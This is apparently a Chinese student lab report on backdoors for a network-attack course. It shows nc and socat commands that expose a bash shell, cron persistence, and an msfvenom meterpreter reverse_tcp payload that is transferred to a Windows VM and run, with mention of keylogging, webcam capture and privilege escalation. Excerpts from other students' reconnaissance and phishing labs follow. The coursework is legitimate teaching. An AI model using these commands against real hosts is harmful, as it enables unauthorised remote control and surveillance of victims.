(1)使用netcat獲取主機操作shell,cron啟動 (1分)
(2)使用socat獲取主機操作shell, 任務計畫啟動 (1分)
(3)使用msf meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機shell(1分)
(4)使用msf meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權 (2分)
(1)例舉乙個後門進入到你系統中的可能方式?
(2)例舉乙個後門啟動起來(win及linux)的方式?
後門偽裝成常用軟體,誘使使用者點選。
(3)meterpreter有哪些給你映像深刻的功能?
獲得system許可權,得到密碼
(4)如何發現自己有系統有沒有被安裝後門?
在做後門的實驗,深刻意識到了後門的危害性,一旦中招,基本攻擊者想知道的資訊都能獲得,在利用meterpreter提取win7許可權竟然成功,看來以後要經常查毒了。
知識要求:
1.netcat是乙個非常簡單的unix工具,可以讀、寫tcp或udp網路連線(network connection);
2.netcat實現簡單伺服器命令:nc -l -p //-l表明nc處於監聽模式,-p指定埠號;
3.nc的-e選項,指定連線後執行的程式。
windows獲得linux shell
linux獲得windows shell。
與上面步驟相反,只不過windows設定連線後啟動cmd。
以下是實驗結果:
ncat檔案傳輸
1、監聽端windows命令:ncat.exe -lv port > filename
2、傳輸端kali命令:nc windows_ip port < filename
結果如下(傳輸的檔案在ncat資料夾下):
cron啟動
命令:crontab -e
修改檔案,crontab -l
檢視修改的檔案。
windows獲得kali shell
1、kali設定監聽命令socat tcp-l:5204 system:bash,pty,stderr
2、windows連線,並獲取許可權socat readline tcp:172.30.1.181 5204
結果:
kali獲得window shell
1、windows端如下圖:
2、kali端如下:
1、生成後門程式命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=linux_ip lport=444 -f exe >20145204.exe
2、利用ncat傳輸檔案使得後門程式進入靶機,具體實現如下圖所示:
3、根據老師教程,在kali中開啟msf設定監聽。
4、在windows端執行後門程式,並獲得許可權如下圖所示:
結果如下:
20145204《網路對抗》資訊收集和漏洞掃瞄技術
本實踐的目標是掌握資訊蒐集的最基礎技能。1 各種搜尋技巧的應用 2 dns ip註冊資訊的查詢 3 基本的掃瞄技術 主機發現 埠掃瞄 os及服務版本探測 具體服務的查點 4 漏洞掃瞄 會掃,會看報告,會查漏洞說明,會修補漏洞 哪些組織負責dns,ip的管理。全球根伺服器均由美國 授權的icann統一...
20155232《網路對抗》Exp7 網路欺詐防範
本實踐的目標理解常用網路欺詐背後的原理,以提高防範意識,並提出具體防範方法。具體實踐有 1 簡單應用set工具建立冒名 1分 2 ettercap dns spoof 1分 3 結合應用兩種技術,用dns spoof引導特定訪問到冒名 1.5分 netstat tupln grep 80指令檢視80...
2015511《網路對抗》網路欺詐技術防範
ping通kali和靶機 因為之後用apache會用到80埠,所以先檢視80埠是否被占用,netstat tupln grep 80,如果有可以用kill 程序號殺死這兩個程序,再次檢視80埠占用情況,沒有被占用的程序 用vi開啟 etc apache2 ports.conf,檢視配置檔案中的監聽埠...